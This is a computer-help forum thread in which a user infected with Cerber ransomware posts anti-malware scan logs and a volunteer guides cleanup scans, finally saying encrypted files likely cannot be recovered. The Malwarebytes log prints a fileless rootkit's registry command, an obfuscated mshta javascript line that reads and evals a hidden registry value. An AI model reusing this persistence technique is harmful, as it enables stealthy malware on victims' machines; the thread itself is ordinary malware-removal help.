Infected by cerber virus

[IPDO]

Hi,

     My notebook got infected by a cerber virus as I saw a lot of files on my desktop saying decrypt my files, and I went for some research and found that it is a cerber ransomware . It has also encrypted my files and I don't know to decrypt it and restore it back.

HP envy 15-ae008TX
Windows 10 64- bit

[Allan]

Please follow the instructions in the following link and post your logs:
http://www.computerhope.com/forum/index.php/topic,46313.0.html

[IPDO]

All the required logs uploaded.

# AdwCleaner v5.201 - Logfile created 20/07/2016 at 15:20:46
# Updated 30/06/2016 by ToolsLib
# Database : 2016-07-19.2 [Server]
# Operating system : Windows 10 Home Single Language  (X64)
# Username : Rehan - ADMIN
# Running from : C:\Users\Rehan\Downloads\adwcleaner_5.201.exe
# Option : Scan
# Support : https://toolslib.net/forum

***** [ Services ] *****


***** [ Folders ] *****


***** [ Files ] *****


***** [ DLL ] *****


***** [ WMI ] *****


***** [ Shortcuts ] *****


***** [ Scheduled tasks ] *****


***** [ Registry ] *****


***** [ Web browsers ] *****


*************************

C:\AdwCleaner\AdwCleaner[S1].txt - [641 bytes] - [20/07/2016 15:20:46]

########## EOF - C:\AdwCleaner\AdwCleaner[S1].txt - [713 bytes] ##########


<?xml version="1.0" encoding="UTF-16" ?>
<mbam-log>
<header>
<date>2016/07/20 15:30:37 +0530</date>
<logfile>mbam-log-2016-07-20 (15-30-03).xml</logfile>
<isadmin>yes</isadmin>
</header>
<engine>
<version>2.2.1.1043</version>
<malware-database>v2016.07.20.06</malware-database>
<rootkit-database>v2016.05.27.01</rootkit-database>
<license>trial</license>
<file-protection>enabled</file-protection>
<web-protection>enabled</web-protection>
<self-protection>disabled</self-protection>
</engine>
<system>
<hostname>ADMIN</hostname>
<ip>192.168.43.143</ip>
<osversion>Windows 10</osversion>
<arch>x64</arch>
<username>Rehan</username>
<filesys>NTFS</filesys>
</system>
<summary>
<type>threat</type>
<result>completed</result>
<objects>304475</objects>
<time>407</time>
<processes>0</processes>
<modules>0</modules>
<keys>3</keys>
<values>1</values>
<datas>0</datas>
<folders>5</folders>
<files>20</files>
<sectors>0</sectors>
</summary>
<options>
<memory>enabled</memory>
<startup>enabled</startup>
<filesystem>enabled</filesystem>
<archives>enabled</archives>
<rootkits>disabled</rootkits>
<deeprootkit>disabled</deeprootkit>
<heuristics>enabled</heuristics>
<pup>enabled</pup>
<pum>enabled</pum>
</options>
<items>
<key><path>HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SppExtComObj.exe</path><vendor>HackTool.AutoKMS</vendor><action>success</action><hash>6cda33f3bae0e6508919e40cd130d22e</hash></key>
<key><path>HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SppExtComObj.exe</path><vendor>HackTool.AutoKMS</vendor><action>success</action><hash>6cda33f3bae0e6508919e40cd130d22e</hash></key>
<key><path>HKU\S-1-5-21-3402600939-4254193186-2331665615-1001_Classes\651043\SHELL\OPEN\COMMAND</path><vendor>Rootkit.Fileless.MTGen</vendor><action>success</action><hash>5de9f1356d2d7eb85fe304fa937040c0</hash></key>
<value><path>HKU\S-1-5-21-3402600939-4254193186-2331665615-1001_Classes\651043\SHELL\OPEN\COMMAND</path><valuename></valuename><vendor>Rootkit.Fileless.MTGen</vendor><action>success</action><valuedata>&quot;C:\WINDOWS\system32\mshta.exe&quot; &quot;javascript:rdu1J2TsG=&quot;BhKjwT&quot;;t0v5=new ActiveXObject(&quot;WScript.Shell&quot;);vxW3Z=&quot;cGqCgT6&quot;;noQ0D6=t0v5.RegRead(&quot;HKCU\\software\\yqsgon\\hdfdvz&quot;);uV8eDSk1=&quot;neCgvCgP&quot;;eval(noQ0D6);y3VwqzhN=&quot;bSoPcA&quot;;&quot;</valuedata><hash>5de9f1356d2d7eb85fe304fa937040c0</hash></value>
<folder><path>C:\ProgramData\Microsoft\Performance\Monitor</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></folder>
<folder><path>C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></folder>
<folder><path>C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></folder>
<folder><path>C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></folder>
<folder><path>C:\ProgramData\Microsoft\Performance\Monitor\temp</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></folder>
<file><path>C:\Program Files (x86)\Cities XXL\steam_api.dll</path><vendor>RiskWare.GameHack</vendor><action>success</action><hash>4afc022406941a1cb2ba52566b9926da</hash></file>
<file><path>C:\Windows\System32\SppExtComObjPatcher.exe</path><vendor>HackTool.AutoKMS</vendor><action>success</action><hash>6cda33f3bae0e6508919e40cd130d22e</hash></file>
<file><path>C:\Users\Rehan\AppData\Local\Temp\ICReinstall_WinRAR_Setup.exe</path><vendor>PUP.Optional.InstallCore</vendor><action>success</action><hash>f94d0b1b2f6bf6402859084b2cd4fd03</hash></file>
<file><path>C:\Users\Rehan\AppData\Local\Temp\ins9D39.tmp</path><vendor>Trojan.Sathurbot</vendor><action>success</action><hash>af979294900ab77fa481c4f130d443bd</hash></file>
<file><path>C:\Users\Rehan\AppData\Local\Temp\Temp2_WinRAR_Setup.zip\WinRAR_Setup.exe</path><vendor>PUP.Optional.InstallCore</vendor><action>success</action><hash>58ee81a5990134020879ec67ea163ac6</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\zepplauncher.mif</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\tmp3BF8.tmp</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\tmp6CCB.tmp</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\tmp6E74.tmp</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\tmp7709.tmp</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\tmp8388.tmp</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\tmp8A9C.tmp</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\tmpA089.tmp</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\tmpB630.tmp</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\tmpE20B.tmp</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\tmpF22C.tmp</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\{3E68883A-E05B-8A20-EE6E-AA5BF6EE8ED7}</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\{68E037CE-7737-AC9B-1D5A-84BC1EAA7F3E}</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\{BA281C97-4445-CB4F-B3EE-177BB951AD13}</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
<file><path>C:\ProgramData\Microsoft\Performance\Monitor\temp\{FCAD63A7-4785-E81C-0BEC-612D62B3C8C8}</path><vendor>Trojan.SathurBot</vendor><action>success</action><hash>93b3230348523ef8267433934ab833cd</hash></file>
</items>
</mbam-log>


 Results of screen317's Security Check version 1.014 --- 12/23/15 
   x64 (UAC is enabled) 
 Internet Explorer 11 
``````````````Antivirus/Firewall Check:``````````````[/u]
 Windows Firewall Enabled! 
Windows Defender                     
McAfee Anti-Virus and Anti-Spyware   
 WMI entry may not exist for antivirus; attempting automatic update.
`````````Anti-malware/Other Utilities Check:`````````[/u]
 Google Chrome (51.0.2704.103)
 Google Chrome (51.0.2704.84)
 Google Chrome (SetupMetrics.pma..)
````````Process Check: objlist.exe by Laurent````````[/u] 
 Malwarebytes Anti-Malware mbamservice.exe 
 Malwarebytes Anti-Malware mbam.exe 
 Malwarebytes Anti-Malware mbamscheduler.exe   
`````````````````System Health check`````````````````[/u]
 Total Fragmentation on Drive C:  %
````````````````````End of Log``````````````````````[/u]


[attachment deleted by admin to conserve space]

[SuperDave]

Hello and welcome to Computer Hope Forum. My name is Dave. I will be helping you out with your particular problem on your computer.

1. I will be working on your Malware issues. This may or may not solve other issues you have with your machine.
2. The fixes are specific to your problem and should only be used for this issue on this machine.
3. If you don't know or understand something, please don't hesitate to ask.
4. Please DO NOT run any other tools or scans while I am helping you.
5. It is important that you reply to this thread. Do not start a new topic.
6. Your security programs may give warnings for some of the tools I will ask you to use. Be assured, any links I give are safe.
7. Absence of symptoms does not mean that everything is clear.

If you can't access the internet with your infected computer you will have to download and transfer any programs to the computer you're using now and transfer them to the infected computer with a CD-RW or a USB storage device. I prefer a CD because a storage device can get infected. If you use a storage device hold the shift key down while inserting the USB storage device for about 10 secs. You will also have to transfer the logs you receive back to the good computer using the same method until we can get the computer back on-line.
*************************************************************************
Please run AdwCleaner again and hit the delete button and post the log.
*********************************************
Please download Malwarebytes Anti-Malware from here.
Double Click mbam-setup.exe to install the application.

• It should update automatically if the computer is connected to the internet.
• Click on Threat Scan and click on Scan Now.
  
• The scan may take some time to finish,so please be patient.
• When the scan is complete make sure all the infections have "quarantine" selected in the Action box.
  
• Click on "Apply actions" You may be asked to Restart your computer to completely remove the infections.
  
• When disinfection is completed you can click on "Copy to Clipboard".
  
• Paste the log in you next reply (CTRL+ V)

*************************************************
Please download Junkware Removal Tool to your desktop.

•Warning! Once the scan is complete JRT will shut down your browser with NO warning.

•Shut down your protection software now to avoid potential conflicts.

•Temporarily disable your Antivirus and any Antispyware real time protection before performing a scan. Click this link to see a list of security programs that should be disabled and how to disable them.

•Run the tool by double-clicking it. If you are using Windows Vista or Windows 7, right-click JRT and select Run as Administrator

•The tool will open and start scanning your system.

•Please be patient as this can take a while to complete depending on your system's specifications.

•On completion, a log (JRT.txt) is saved to your desktop and will automatically open.

•Copy and Paste the JRT.txt log into your next message.
****************************************************
I'm not sure if this will run on your notebook but give it a try.

Download Security Check by screen317 from one of the following links and save it to your desktop.

Security Check

* Double-click Security Check.bat
* Follow the on-screen instructions inside of the black box.
* A Notepad document should open automatically called checkup.txt
* Post the contents of that document in your next reply.

Note: If a security program requests permission from dig.exe to access the Internet, allow it to do so.

[IPDO]

All the files are uploaded.

[attachment deleted by admin to conserve space]

[SuperDave]

Please do not attach your logs unless absolutely necessary. Copy and paste them in your reply(ies)

I'd like to scan your machine with ESET OnlineScan

•Hold down Control and click on the following link to open ESET OnlineScan in a new window.
ESET OnlineScan

•Click the button.
•For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)

• Click on to download the ESET Smart Installer. Save it to your desktop.
  
• Double click on the icon on your desktop.
  

•Check
•Click the button.
•Accept any security warnings from your browser.

• Leave the check mark next to Remove found threats.
  

•Check
•Push the Start button.
•ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
•When the scan completes, push
•Push , and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
•Push the button.
•Push
A log file will be saved here: C:\Program Files\ESET\ESET Online Scanner\log.txt

[IPDO]

ESET hangs after 3 hours of scanning.

[SuperDave]

I see. Let's try another.
Please go to Kaspersky website and perform an online antivirus scan.


1. Read through the requirements and privacy statement and click on Accept button.
2. It will start downloading and installing the scanner and virus definitions. You will be prompted to install an application from Kaspersky. Click Run.
3. When the downloads have finished, click on Settings.
4. Make sure these boxes are checked (ticked). If they are not, please tick them and click on the Save button:
Spyware, Adware, Dialers, and other potentially dangerous programs
Archives

5. Click on My Computer under Scan.
6. Once the scan is complete, it will display the results. Click on View Scan Report.
7. You will see a list of infected items there. Click on Save Report As....
8. Save this report to a convenient place. Change the Files of type to Text file (.txt) before clicking on the Save button.
9. Please post this log in your next reply.

[IPDO]

check boxes not present in settings for Spyware, Adware, Dialers, and other potentially dangerous programs Archives.
Save Report as option not available.

[SuperDave]

What's the status of your computer now?

[IPDO]

Kaspersky detects no viruses or malware etc. Computer is running "ok". According to Cerber profile i read from one of the antivirus source that it deletes itself after encrypting the files. Now the problem is how to decrypt those files?

[SuperDave]

I'm afraid I can't help much with encrypted files. You can try doing some searches on-line but I wouldn't hold out too much hope. That's why back-ups are so important.

Here is some more information about encrypted files. Caution: Do not download any programs from this link. I cannot vouch for their effectiveness and security.
You might want to try some of these file recovery programs listed here.